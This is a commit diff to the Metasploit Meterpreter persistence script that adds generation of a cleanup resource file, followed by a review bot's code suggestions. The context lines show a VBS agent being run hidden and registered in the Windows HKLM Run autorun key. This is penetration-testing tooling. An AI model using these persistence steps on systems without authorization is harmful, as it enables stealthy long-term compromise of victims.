Added auto generation of cleanup script to persistence Meterpreter script
git-svn-id: file:///home/svn/framework3/trunk@9190 4d416f70-5f16-0410-b530-b9f4589650daunstable
parent
5bc9a572e6
commit
f6f88e90dc
|
@ -50,6 +50,29 @@ opts.parse(args) do |opt, idx, val|
|
||||||
end
|
end
|
||||||
end
|
end
|
||||||
|
|
||||||
|
host_name = client.sys.config.sysinfo['Computer']
|
||||||
|
# Create Filename info to be appended to downloaded files
|
||||||
|
filenameinfo = "_" + ::Time.now.strftime("%Y%m%d.%M%S")
|
||||||
|
|
||||||
|
# Create a directory for the logs
|
||||||
|
logs = ::File.join(Msf::Config.log_directory, 'persistence', host_name + filenameinfo )
|
||||||
|
|
||||||
|
# Create the log directory
|
||||||
|
::FileUtils.mkdir_p(logs)
|
||||||
|
|
||||||
|
# Cleaup script file name
|
||||||
|
dest = logs + "/clean_up_" + filenameinfo + ".rc"
|
||||||
|
|
||||||
|
#Writes a given string to a file specified
|
||||||
|
def fs_filewrt(file2wrt, data2wrt)
|
||||||
|
output = ::File.open(file2wrt, "a")
|
||||||
|
if data2wrt
|
||||||
|
data2wrt.each_line do |d|
|
||||||
|
output.puts(d)
|
||||||
|
end
|
||||||
|
end
|
||||||
|
output.close
|
||||||
|
end
|
||||||
#
|
#
|
||||||
# Create the persistent VBS
|
# Create the persistent VBS
|
||||||
#
|
#
|
||||||
|
@ -81,7 +104,7 @@ print_status("Uploaded the persistent agent to #{tempvbs}")
|
||||||
#
|
#
|
||||||
proc = session.sys.process.execute("wscript \"#{tempvbs}\"", nil, {'Hidden' => true})
|
proc = session.sys.process.execute("wscript \"#{tempvbs}\"", nil, {'Hidden' => true})
|
||||||
print_status("Agent executed with PID #{proc.pid}")
|
print_status("Agent executed with PID #{proc.pid}")
|
||||||
|
fs_filewrt(dest, "kill #{proc.pid}\n")
|
||||||
#
|
#
|
||||||
# Setup the multi/handler if requested
|
# Setup the multi/handler if requested
|
||||||
#
|
#
|
||||||
|
@ -110,8 +133,9 @@ if(install)
|
||||||
if(key)
|
if(key)
|
||||||
key.set_value(nam, session.sys.registry.type2str("REG_SZ"), tempvbs)
|
key.set_value(nam, session.sys.registry.type2str("REG_SZ"), tempvbs)
|
||||||
print_status("Installed into autorun as HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\#{nam}")
|
print_status("Installed into autorun as HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\#{nam}")
|
||||||
|
fs_filewrt(dest, "reg deleteval -k \'HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\' -v #{nam}\n")
|
||||||
else
|
else
|
||||||
print_status("Error: failed to open the registry key for writing")
|
print_status("Error: failed to open the registry key for writing")
|
||||||
end
|
end
|
||||||
end
|
end
|
||||||
|
print_status("For cleanup use command: run multi_console_command -s #{dest}")
|
||||||
|
|
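Review bot: In the first hunk, `filenameinfo` is built with `strftime("%Y%m%d.%M%S")`, which omits the hour, so two runs against the same host on the same day can map to the same `logs` directory and `dest` file. Because `fs_filewrt` opens with `"a"`, one session's cleanup commands would then be appended to another's; `"%Y%m%d.%H%M%S"` avoids that. `host_name` is taken from the remote `sysinfo['Computer']` value and passed unfiltered into `::File.join` and `mkdir_p` on the local machine, so it should be treated as untrusted and normalized first, for example `host_name = host_name.to_s.gsub(/[^\w.-]/, '_')`. `fs_filewrt` would also be safer in block form, `::File.open(file2wrt, "a") { |f| f.puts(data2wrt) if data2wrt }`, so the handle is closed even if a write raises.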